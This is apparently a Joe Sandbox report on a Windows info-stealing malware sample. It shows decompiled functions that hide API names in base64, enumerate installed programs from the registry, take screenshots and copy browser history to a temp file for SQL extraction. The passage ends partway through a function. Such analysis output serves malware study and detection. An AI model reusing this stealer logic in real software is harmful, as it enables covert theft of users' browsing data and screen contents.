                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                      • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                      • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                      • API String ID: 3877065590-4127804628
                                                                      • Opcode ID: 23aed005d1cd924713a6c9523997cf456d4e38f9e5c7cc2fcb202ae1bcbd67cf
                                                                      • Instruction ID: fd76d8ed353255a1278cd755ee3df483ef4fe920b1e5afc451e9d1c12470fbd9
                                                                      • Opcode Fuzzy Hash: 23aed005d1cd924713a6c9523997cf456d4e38f9e5c7cc2fcb202ae1bcbd67cf
                                                                      • Instruction Fuzzy Hash: B2818570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00415F30 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 305registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 51%
                                                                      			E00415F30(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				char _v1009;
				char _v1016;
				intOrPtr _v1020;
				char _v1024;
				char _v1028;
				char _v1032;
				char _v1036;
				char _v1040;
				char _v1044;
				char _v1048;
				char _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				char _v1068;
				char _v1072;
				char _v1076;
				intOrPtr _v1080;
				char _v1084;
				char _v1088;
				char _v1092;
				char _v1096;
				char _v1100;
				char _v1104;
				char _v1108;
				char _v1112;
				char _v1116;
				char _v1120;
				char _v1124;
				char _v1128;
				char _v1132;
				char _v1136;
				char _v1140;
				char _v1144;
				char _v1148;
				void* _t123;
				void* _t144;
				void* _t178;
				void* _t199;
				intOrPtr* _t262;
				void* _t263;
				void* _t265;
				void* _t267;
				void* _t269;
				void* _t271;
				intOrPtr _t318;
				char* _t329;
				int _t331;
				int _t332;
				intOrPtr _t334;
				intOrPtr _t335;

				_t334 = _t335;
				_t263 = 0x8f;
				do {
					_push(0);
					_push(0);
					_t263 = _t263 - 1;
				} while (_t263 != 0);
				_t262 = __eax;
				_t329 =  &_v1009;
				_push(_t334);
				_push(0x416452);
				_push( *[fs:eax]);
				 *[fs:eax] = _t335;
				E004034E4(__eax);
				_t331 = 0;
				E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1016, _t329, 0);
				RegOpenKeyExA(0x80000002, E00403990(_v1016), 0, 0x20019,  &_v8);
				while(RegEnumKeyA(_v8, _t331, _t329, 0x3e9) == 0) {
					E00403D2C( &_v1024,  *_t262);
					_push(_v1024);
					_push(0);
					_push( &_v1028);
					E00406984("RGlzcGxheU5hbWU=", _t262,  &_v1036, _t329, _t331);
					E00403C98( &_v1032, E00403990(_v1036));
					_push(_v1032);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1044, _t329, _t331);
					_push( &_v1044);
					E00403748( &_v1048, 0x3e9, _t329);
					_pop(_t123);
					E00403798(_t123, _v1048);
					E00403C98( &_v1040, E00403990(_v1044));
					_pop(_t265);
					E00407500(0x80000002, _t262, _t265, _v1040);
					_push(_v1028);
					_push(0x416528);
					_push(0);
					_push( &_v1052);
					E00406984("RGlzcGxheVZlcnNpb24=", _t262,  &_v1060, _t329, _t331);
					E00403C98( &_v1056, E00403990(_v1060));
					_push(_v1056);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1068, _t329, _t331);
					_push( &_v1068);
					E00403748( &_v1072, 0x3e9, _t329);
					_pop(_t144);
					E00403798(_t144, _v1072);
					E00403C98( &_v1064, E00403990(_v1068));
					_pop(_t267);
					E00407500(0x80000002, _t262, _t267, _v1064);
					_push(_v1052);
					_push(")");
					E00403E1C();
					E0040377C(_t262, _v1020);
					_t331 = _t331 + 1;
				}
				_t332 = 0;
				E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1076, _t329, 0);
				RegOpenKeyExA(0x80000001, E00403990(_v1076), 0, 0x20019,  &_v8);
				while(RegEnumKeyA(_v8, _t332, _t329, 0x3e9) == 0) {
					E00403D2C( &_v1084,  *_t262);
					_push(_v1084);
					_push(0);
					_push( &_v1088);
					E00406984("RGlzcGxheU5hbWU=", _t262,  &_v1096, _t329, _t332);
					E00403C98( &_v1092, E00403990(_v1096));
					_push(_v1092);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1104, _t329, _t332);
					_push( &_v1104);
					E00403748( &_v1108, 0x3e9, _t329);
					_pop(_t178);
					E00403798(_t178, _v1108);
					E00403C98( &_v1100, E00403990(_v1104));
					_pop(_t269);
					E00407500(0x80000001, _t262, _t269, _v1100);
					_push(_v1088);
					_push(0x416528);
					_push(0);
					_push( &_v1112);
					E00406984("RGlzcGxheVZlcnNpb24=", _t262,  &_v1120, _t329, _t332);
					E00403C98( &_v1116, E00403990(_v1120));
					_push(_v1116);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1128, _t329, _t332);
					_push( &_v1128);
					E00403748( &_v1132, 0x3e9, _t329);
					_pop(_t199);
					E00403798(_t199, _v1132);
					E00403C98( &_v1124, E00403990(_v1128));
					_pop(_t271);
					E00407500(0x80000001, _t262, _t271, _v1124);
					_push(_v1112);
					_push(")");
					E00403E1C();
					E0040377C(_t262, _v1080);
					_t332 = _t332 + 1;
				}
				E00403D2C( &_v1140,  *_t262);
				E004070BC(_v1140, _t262, 0x41655c, L"()\r\n",  &_v1136);
				E0040377C(_t262, _v1136);
				E00403D2C( &_v1148,  *_t262);
				E004070BC(_v1148, _t262, 0x41655c, L"\r\n\r\n",  &_v1144);
				E0040377C(_t262, _v1144);
				_pop(_t318);
				 *[fs:eax] = _t318;
				_push(E0041645C);
				E00403B98( &_v1148, 4);
				E00403508( &_v1132, 2);
				E00403B80( &_v1124);
				E004034E4( &_v1120);
				E00403B98( &_v1116, 2);
				E00403508( &_v1108, 2);
				E00403B80( &_v1100);
				E004034E4( &_v1096);
				E00403B98( &_v1092, 4);
				E00403508( &_v1076, 3);
				E00403B80( &_v1064);
				E004034E4( &_v1060);
				E00403B98( &_v1056, 2);
				E00403508( &_v1048, 2);
				E00403B80( &_v1040);
				E004034E4( &_v1036);
				E00403B98( &_v1032, 4);
				return E004034E4( &_v1016);
			}























































                                                                      0x00415f31
                                                                      0x00415f33
                                                                      0x00415f38
                                                                      0x00415f38
                                                                      0x00415f3a
                                                                      0x00415f3c
                                                                      0x00415f3c
                                                                      0x00415f42
                                                                      0x00415f44
                                                                      0x00415f4c
                                                                      0x00415f4d
                                                                      0x00415f52
                                                                      0x00415f55
                                                                      0x00415f5a
                                                                      0x00415f5f
                                                                      0x00415f77
                                                                      0x00415f8d
                                                                      0x0041610a
                                                                      0x00415f9f
                                                                      0x00415fa4
                                                                      0x00415faa
                                                                      0x00415fb2
                                                                      0x00415fbe
                                                                      0x00415fd6
                                                                      0x00415fe1
                                                                      0x00415fed
                                                                      0x00415ff8
                                                                      0x00416006
                                                                      0x00416011
                                                                      0x00416012
                                                                      0x0041602a
                                                                      0x0041603a
                                                                      0x0041603b
                                                                      0x00416040
                                                                      0x00416046
                                                                      0x0041604b
                                                                      0x00416053
                                                                      0x0041605f
                                                                      0x00416077
                                                                      0x00416082
                                                                      0x0041608e
                                                                      0x00416099
                                                                      0x004160a7
                                                                      0x004160b2
                                                                      0x004160b3
                                                                      0x004160cb
                                                                      0x004160db
                                                                      0x004160dc
                                                                      0x004160e1
                                                                      0x004160e7
                                                                      0x004160f7
                                                                      0x00416104
                                                                      0x00416109
                                                                      0x00416109
                                                                      0x00416122
                                                                      0x0041613a
                                                                      0x00416150
                                                                      0x004162cd
                                                                      0x00416162
                                                                      0x00416167
                                                                      0x0041616d
                                                                      0x00416175
                                                                      0x00416181
                                                                      0x00416199
                                                                      0x004161a4
                                                                      0x004161b0
                                                                      0x004161bb
                                                                      0x004161c9
                                                                      0x004161d4
                                                                      0x004161d5
                                                                      0x004161ed
                                                                      0x004161fd
                                                                      0x004161fe
                                                                      0x00416203
                                                                      0x00416209
                                                                      0x0041620e
                                                                      0x00416216
                                                                      0x00416222
                                                                      0x0041623a
                                                                      0x00416245
                                                                      0x00416251
                                                                      0x0041625c
                                                                      0x0041626a
                                                                      0x00416275
                                                                      0x00416276
                                                                      0x0041628e
                                                                      0x0041629e
                                                                      0x0041629f
                                                                      0x004162a4
                                                                      0x004162aa
                                                                      0x004162ba
                                                                      0x004162c7
                                                                      0x004162cc
                                                                      0x004162cc
                                                                      0x004162f4
                                                                      0x00416309
                                                                      0x00416316
                                                                      0x0041632a
                                                                      0x0041633f
                                                                      0x0041634c
                                                                      0x00416353
                                                                      0x00416356
                                                                      0x00416359
                                                                      0x00416369
                                                                      0x00416379
                                                                      0x00416384
                                                                      0x0041638f
                                                                      0x0041639f
                                                                      0x004163af
                                                                      0x004163ba
                                                                      0x004163c5
                                                                      0x004163d5
                                                                      0x004163e5
                                                                      0x004163f0
                                                                      0x004163fb
                                                                      0x0041640b
                                                                      0x0041641b
                                                                      0x00416426
                                                                      0x00416431
                                                                      0x00416441
                                                                      0x00416451

                                                                      APIs
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                      • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                      • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                      • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                        • Part of subcall function 00407500: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                                                                        • Part of subcall function 00407500: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582
                                                                        • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                        • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Open$EnumFreeString$QueryValue
                                                                      • String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
                                                                      • API String ID: 811798878-3013244427
                                                                      • Opcode ID: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
                                                                      • Instruction ID: 33798bc805095534a257e2f05040e6cfe59ff7211d39a9aa4329e2c1f04a858c
                                                                      • Opcode Fuzzy Hash: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
                                                                      • Instruction Fuzzy Hash: 34C124B1A001189BD710EB55CC81BCEB7BDAF44309F5145FBA608B7286DA38AF858F5D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004178B4 Relevance: 15.2, APIs: 10, Instructions: 162windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 30%
                                                                      			E004178B4(int __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, int _a16) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _v32;
				struct HWND__* _v48;
				struct HWND__* _v52;
				struct HWND__* _v56;
				char _v60;
				intOrPtr _v124;
				char _v132;
				char _v148;
				char* _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				void* _v176;
				char _v180;
				intOrPtr* _t78;
				struct HDC__* _t100;
				intOrPtr _t107;
				void* _t112;
				void* _t114;
				struct HDC__* _t116;
				struct HDC__* _t118;
				void* _t121;

				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t121);
				_push(0x417adb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t121 + 0xffffff50;
				if( *0x41c868 != 0 &&  *0x41c86c != 0 &&  *0x41c870 != 0 &&  *0x41c874 != 0 &&  *0x41c878 != 0 &&  *0x41c87c != 0 &&  *0x41c880 != 0 &&  *0x41c884 != 0 &&  *0x41c888 != 0 &&  *0x41c88c != 0) {
					_v60 = 1;
					_v56 = 0;
					_v52 = 0;
					_v48 = 0;
					_push(0);
					_push( &_v60);
					_push( &_v20);
					if( *0x41c86c() == 0) {
						_t100 = GetDC(0);
						_t116 = CreateCompatibleDC(0);
						_t112 = CreateCompatibleBitmap(_t100, _v8, _v12);
						SelectObject(_t116, _t112);
						BitBlt(_t116, 0, 0, _v8, _v12, _t100, _v16, _a16, 0xcc0020);
						 *0x41c888(0, 0xffffffff, E00404900( &_v28));
						 *0x41c874(_t112, 0,  &_v24);
						E004177E0(_a8, _t100,  &_v148, _t112, _t116);
						_v180 = 1;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t114 = _t112;
						_t118 = _t116;
						_v160 = 1;
						_v156 = 4;
						_v152 =  &_a12;
						 *0x41c884(_v24, _v28,  &_v148,  &_v180);
						_t78 = _v28;
						 *((intOrPtr*)( *_t78 + 0x30))(_t78,  &_v132, 1);
						 *0x41c88c(_v28,  &_v32);
						GlobalFix(_v32);
						E004035D4(_a4, _v124, _v32);
						 *0x41c880(_v24);
						GlobalUnWire(_v32);
						DeleteObject(_t114);
						DeleteDC(_t118);
						ReleaseDC(0, _t100);
						 *0x41c870(_v20);
					}
				}
				_pop(_t107);
				 *[fs:eax] = _t107;
				_push(E00417AE2);
				return E00404900( &_v28);
			}






























                                                                      0x004178c2
                                                                      0x004178c5
                                                                      0x004178c8
                                                                      0x004178cb
                                                                      0x004178d0
                                                                      0x004178d1
                                                                      0x004178d6
                                                                      0x004178d9
                                                                      0x004178e3
                                                                      0x0041795e
                                                                      0x00417965
                                                                      0x0041796c
                                                                      0x00417973
                                                                      0x0041797a
                                                                      0x0041797f
                                                                      0x00417983
                                                                      0x0041798c
                                                                      0x00417999
                                                                      0x004179a2
                                                                      0x004179b2
                                                                      0x004179b6
                                                                      0x004179d6
                                                                      0x004179e8
                                                                      0x004179f5
                                                                      0x00417a04
                                                                      0x00417a09
                                                                      0x00417a20
                                                                      0x00417a21
                                                                      0x00417a22
                                                                      0x00417a23
                                                                      0x00417a24
                                                                      0x00417a25
                                                                      0x00417a26
                                                                      0x00417a30
                                                                      0x00417a3d
                                                                      0x00417a59
                                                                      0x00417a65
                                                                      0x00417a6b
                                                                      0x00417a76
                                                                      0x00417a80
                                                                      0x00417a8f
                                                                      0x00417a98
                                                                      0x00417aa2
                                                                      0x00417aa8
                                                                      0x00417aae
                                                                      0x00417ab6
                                                                      0x00417abf
                                                                      0x00417abf
                                                                      0x0041798c
                                                                      0x00417ac7
                                                                      0x00417aca
                                                                      0x00417acd
                                                                      0x00417ada

                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00417994
                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0041799D
                                                                      • CreateCompatibleBitmap.GDI32(00000000,0041A69E,?), ref: 004179AD
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004179B6
                                                                      • BitBlt.GDI32(00000000,00000000,00000000,0041A69E,?,00000000,00000000,?,00CC0020), ref: 004179D6
                                                                      • GlobalFix.KERNEL32 ref: 00417A80
                                                                      • GlobalUnWire.KERNEL32(?), ref: 00417AA2
                                                                      • DeleteObject.GDI32(00000000), ref: 00417AA8
                                                                      • DeleteDC.GDI32(00000000), ref: 00417AAE
                                                                      • ReleaseDC.USER32 ref: 00417AB6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CompatibleCreateDeleteGlobalObject$BitmapReleaseSelectWire
                                                                      • String ID:
                                                                      • API String ID: 914135935-0
                                                                      • Opcode ID: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
                                                                      • Instruction ID: 9ea5443061d6a736e16c7905b4946b830ee6406ef7c7b01cecb07d86951751fb
                                                                      • Opcode Fuzzy Hash: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
                                                                      • Instruction Fuzzy Hash: 9B513CB1944208AFDB10EFA5DC85BEF7BF8AB48305F24402AF614E62D1D7789985CB58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004129A4 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 49%
                                                                      			E004129A4(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				long _t73;
				WCHAR* _t86;
				intOrPtr* _t101;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr* _t109;
				intOrPtr* _t138;
				void* _t140;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t152;
				intOrPtr* _t158;
				intOrPtr* _t164;
				void* _t166;
				void* _t178;
				intOrPtr _t198;
				intOrPtr _t200;
				intOrPtr _t213;
				intOrPtr _t217;
				intOrPtr _t218;
				void* _t219;
				void* _t220;

				_t215 = __esi;
				_t177 = __ebx;
				_t217 = _t218;
				_t178 = 0xb;
				do {
					_push(0);
					_push(0);
					_t178 = _t178 - 1;
					_t223 = _t178;
				} while (_t178 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				_t3 =  &_v8; // 0x6f747365
				E004040F4(_t3);
				_push(_t217);
				_push(0x412c71);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				_t4 =  &_v28; // 0x6f747351
				E00403B80(_t4);
				_push(_t217);
				_push(0x412be7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				_t73 = GetTickCount();
				_t5 =  &_v60; // 0x6f747331
				E00406FDC(_t73, __ebx, _t5, __esi, _t223);
				_push(_v60);
				_t7 =  &_v64; // 0x6f74732d
				E00406F1C(_t7, __ebx, __edi, __esi, _t223);
				_push(_v64);
				_push(L".tmp");
				E00403E1C();
				_t10 =  &_v40; // 0x6f747345
				E0040781C(_v8, _t177, _t10, _t223);
				_t12 =  &_v72; // 0x6f747325
				E004062D8(L"%TEMP%", _t12, _t223);
				_push(_v72);
				_push(0x412ca8);
				_push(_v32);
				E00403E1C();
				_t17 =  &_v44; // 0x6f747341
				E0040781C(_v68, _t177, _t17, _t223);
				_t86 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t86, 0xffffffff);
				_t20 =  &_v76; // 0x6f747321
				E0040377C(_t20, _v44);
				_t23 =  &_v36; // 0x6f747349
				E00404AFC(_v76, _t177, _t178, _t23, _t215, _t223);
				_t24 =  &_v80; // 0x6f74731d
				E00403D2C(_t24, _v36);
				if(E004076B0(_v80, _t177, _t178) != 0) {
					_t101 =  *0x41b55c; // 0x41c784
					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
					_t219 = _t218 + 8;
					__eflags = _t103;
					if(_t103 == 0) {
						_t138 =  *0x41b5cc; // 0x41c78c
						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\"unixepoch\") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By  visits.visit_time DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
						_t220 = _t219 + 0x14;
						__eflags = _t140;
						if(_t140 == 0) {
							while(1) {
								_t142 =  *0x41b600; // 0x41c790
								_t144 =  *((intOrPtr*)( *_t142))(_v20);
								__eflags = _t144 - 0x64;
								if(_t144 != 0x64) {
									goto L9;
								}
								E004034E4( &_v48);
								E004034E4( &_v52);
								E004034E4( &_v56);
								_t152 =  *0x41b588; // 0x41c794
								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
								_t158 =  *0x41b588; // 0x41c794
								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
								_t164 =  *0x41b588; // 0x41c794
								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
								_t220 = _t220 + 0x18;
								E004036DC( &_v56, _t166);
								_push(_v28);
								_push(E00412D70);
								E00403D2C( &_v84, _v48);
								_push(_v84);
								_push(0x412d78);
								E00403D2C( &_v88, _v52);
								_push(_v88);
								_push(0x412d84);
								E00403D2C( &_v92, _v56);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
							}
						}
					}
					L9:
					_t105 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t105))(_v20);
					_t109 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t109))(_v16);
					_pop(_t198);
					 *[fs:eax] = _t198;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t213);
					 *[fs:eax] = _t213;
				}
				_pop(_t200);
				 *[fs:eax] = _t200;
				_push(E00412C78);
				_t58 =  &_v92; // 0x6f747311
				E00403B98(_t58, 4);
				_t59 =  &_v76; // 0x6f747321
				E004034E4(_t59);
				_t60 =  &_v72; // 0x6f747325
				E00403B98(_t60, 4);
				_t61 =  &_v56; // 0x6f747335
				E00403508(_t61, 3);
				_t62 =  &_v44; // 0x6f747341
				E00403B98(_t62, 2);
				_t63 =  &_v36; // 0x6f747349
				E004034E4(_t63);
				_t64 =  &_v32; // 0x6f74734d
				E00403B98(_t64, 2);
				_t65 =  &_v8; // 0x6f747365
				return E00403B80(_t65);
			}















































                                                                      0x004129a4
                                                                      0x004129a4
                                                                      0x004129a5
                                                                      0x004129a7
                                                                      0x004129ac
                                                                      0x004129ac
                                                                      0x004129ae
                                                                      0x004129b0
                                                                      0x004129b0
                                                                      0x004129b0
                                                                      0x004129b3
                                                                      0x004129b4
                                                                      0x004129b5
                                                                      0x004129b6
                                                                      0x004129b9
                                                                      0x004129bc
                                                                      0x004129bf
                                                                      0x004129c6
                                                                      0x004129c7
                                                                      0x004129cc
                                                                      0x004129cf
                                                                      0x004129d2
                                                                      0x004129d5
                                                                      0x004129dc
                                                                      0x004129dd
                                                                      0x004129e2
                                                                      0x004129e5
                                                                      0x004129e8
                                                                      0x004129ed
                                                                      0x004129f0
                                                                      0x004129f5
                                                                      0x004129f8
                                                                      0x004129fb
                                                                      0x00412a00
                                                                      0x00412a03
                                                                      0x00412a10
                                                                      0x00412a15
                                                                      0x00412a1b
                                                                      0x00412a20
                                                                      0x00412a28
                                                                      0x00412a2d
                                                                      0x00412a30
                                                                      0x00412a35
                                                                      0x00412a40
                                                                      0x00412a48
                                                                      0x00412a4b
                                                                      0x00412a55
                                                                      0x00412a64
                                                                      0x00412a69
                                                                      0x00412a6f
                                                                      0x00412a77
                                                                      0x00412a7a
                                                                      0x00412a7f
                                                                      0x00412a85
                                                                      0x00412a94
                                                                      0x00412ab0
                                                                      0x00412ab7
                                                                      0x00412ab9
                                                                      0x00412abc
                                                                      0x00412abe
                                                                      0x00412ad7
                                                                      0x00412ade
                                                                      0x00412ae0
                                                                      0x00412ae3
                                                                      0x00412ae5
                                                                      0x00412baa
                                                                      0x00412bae
                                                                      0x00412bb5
                                                                      0x00412bb8
                                                                      0x00412bbb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412af3
                                                                      0x00412afb
                                                                      0x00412b03
                                                                      0x00412b0e
                                                                      0x00412b1f
                                                                      0x00412b2a
                                                                      0x00412b3b
                                                                      0x00412b46
                                                                      0x00412b4d
                                                                      0x00412b4f
                                                                      0x00412b57
                                                                      0x00412b5c
                                                                      0x00412b5f
                                                                      0x00412b6a
                                                                      0x00412b6f
                                                                      0x00412b72
                                                                      0x00412b7d
                                                                      0x00412b82
                                                                      0x00412b85
                                                                      0x00412b90
                                                                      0x00412b95
                                                                      0x00412b98
                                                                      0x00412ba5
                                                                      0x00412ba5
                                                                      0x00412baa
                                                                      0x00412ae5
                                                                      0x00412bc1
                                                                      0x00412bc5
                                                                      0x00412bcc
                                                                      0x00412bd3
                                                                      0x00412bda
                                                                      0x00412bdf
                                                                      0x00412be2
                                                                      0x00412bf7
                                                                      0x00412c05
                                                                      0x00412a96
                                                                      0x00412a98
                                                                      0x00412a9b
                                                                      0x00412a9b
                                                                      0x00412c0c
                                                                      0x00412c0f
                                                                      0x00412c12
                                                                      0x00412c17
                                                                      0x00412c1f
                                                                      0x00412c24
                                                                      0x00412c27
                                                                      0x00412c2c
                                                                      0x00412c34
                                                                      0x00412c39
                                                                      0x00412c41
                                                                      0x00412c46
                                                                      0x00412c4e
                                                                      0x00412c53
                                                                      0x00412c56
                                                                      0x00412c5b
                                                                      0x00412c63
                                                                      0x00412c68
                                                                      0x00412c70

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 004129E8
                                                                      • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412CA8,?,.tmp,?,?,00000000,00412BE7,?,00000000,00412C71,?,00000000), ref: 00412A64
                                                                      • DeleteFileW.KERNEL32(00000000), ref: 00412C05
                                                                      Strings
                                                                      • SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412ACE
                                                                      • %TEMP%, xrefs: 00412A23
                                                                      • , xrefs: 00412B98
                                                                      • .tmp, xrefs: 00412A03
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$CopyCountDeleteTick
                                                                      • String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
                                                                      • API String ID: 2381671008-351388873
                                                                      • Opcode ID: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
                                                                      • Instruction ID: 01415e14dcc46a11cfd4ad831b9185370b0be0c5393ee3a374a7f2b0250afb3b
                                                                      • Opcode Fuzzy Hash: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
                                                                      • Instruction Fuzzy Hash: 05810C31A00109AFDB00EF95DD82ADEBBB9EF48315F204436F514F7292DB78AE558B58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041256C Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 43%
                                                                      			E0041256C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				WCHAR* _t86;
				intOrPtr* _t101;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr* _t109;
